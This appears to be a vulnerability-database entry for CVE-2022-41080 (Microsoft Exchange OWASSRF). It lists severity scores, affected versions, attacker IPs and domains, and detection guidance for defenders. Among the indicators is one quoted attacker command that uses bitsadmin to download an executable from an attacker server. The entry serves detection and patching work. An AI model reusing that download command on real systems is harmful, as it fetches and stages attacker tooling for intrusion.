cbcvebase.
CVE-2022-41080
published 2022-11-09

CVE-2022-41080: Microsoft Exchange Server Elevation of Privilege Vulnerability

PriorityP197critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITRansomware
CISA Known Exploited Vulnerabilitydue 2023-01-31
Exploited in the wild
EPSS
77.33%
99.5th percentile
Microsoft Exchange Server Elevation of Privilege Vulnerability

Affected

13 ranges
VendorProductVersion rangeFixed in
microsoftexchange_server
microsoftexchange_server
microsoftexchange_server
microsoftmicrosoft_exchange_server_2013_cumulative_update_23>= 15.00.0 < 15.00.1497.04415.00.1497.044
microsoftmicrosoft_exchange_server_2016_cumulative_update_22>= 15.0.0 < 15.01.2375.03715.01.2375.037
microsoftmicrosoft_exchange_server_2016_cumulative_update_23>= 15.01.0 < 15.01.2507.01615.01.2507.016
microsoftmicrosoft_exchange_server_2019_cumulative_update_11>= 15.02.0 < 15.02.0986.03615.02.0986.036
microsoftmicrosoft_exchange_server_2019_cumulative_update_12>= 15.02.0 < 15.02.1118.02015.02.1118.020
msrcmicrosoft_exchange_server_2013_cumulative_update_23
msrcmicrosoft_exchange_server_2016_cumulative_update_22
msrcmicrosoft_exchange_server_2016_cumulative_update_23
msrcmicrosoft_exchange_server_2019_cumulative_update_11
msrcmicrosoft_exchange_server_2019_cumulative_update_12

Detection & IOCsextracted from sources · hover to see the quote

ip45.76.141.84
ip179.60.149.28
ip179.60.149.28
ip155.138.240.251
ip66.42.116.130
urlhttp://179.60.149.28:4427/22.exe
domainautodiscover.hofduncan.org
domainmail.stannparish.org
domaininstance-cmjrni-relay.screenconnect.com
pathC:\1.exe
commandbitsadmin /transfer JobName /download /priority FOREGROUND http://179.60.149.28:4427/22.exe C:\1.exe
otherScreenConnect instance ID: b81d2f07c9163bf5
otherScreenConnect instance ID: dc2f2d1c0840229c
  • Detect PowerShell spawned as a child process of the IIS web server process (w3wp.exe) — a Sigma rule for this is available in the Huntress Threat Intel GitHub repository
  • Detect use of raw TCP sockets in PowerShell command lines as an indicator of the SilverArrow reverse shell payload used in post-exploitation
  • Check for base64-encoded PowerShell command lines running as child processes of w3wp.exe as a secondary indicator of OWASSRF exploitation
  • The OWASSRF exploit uses the pypsrp Python package to communicate via PowerShell Remoting protocol through the OWA authenticated HTTP session — look for WSMan traffic proxied through OWA
  • Attackers used bitsadmin.exe (native Windows utility) to download post-exploitation tooling from attacker-controlled infrastructure — monitor for bitsadmin child processes of w3wp.exe
  • ·The OWASSRF exploit bypasses the URL rewrite mitigations Microsoft provided for ProxyNotShell in September 2022 — those mitigations are NOT effective against CVE-2022-41080-based exploitation
  • ·The exploit only requires valid but unprivileged Exchange/OWA credentials — no administrative account is needed for initial access
  • ·Exchange Online (cloud) customers are not affected; only on-premises Exchange Server 2013, 2016, and 2019 installations prior to KB5019758 are vulnerable
  • ·Successful exploitation results in code execution as NT AUTHORITY\SYSTEM, not just the authenticated user's privilege level

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck8.8HIGH
cisa9.8CRITICAL
vendor_msrc8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.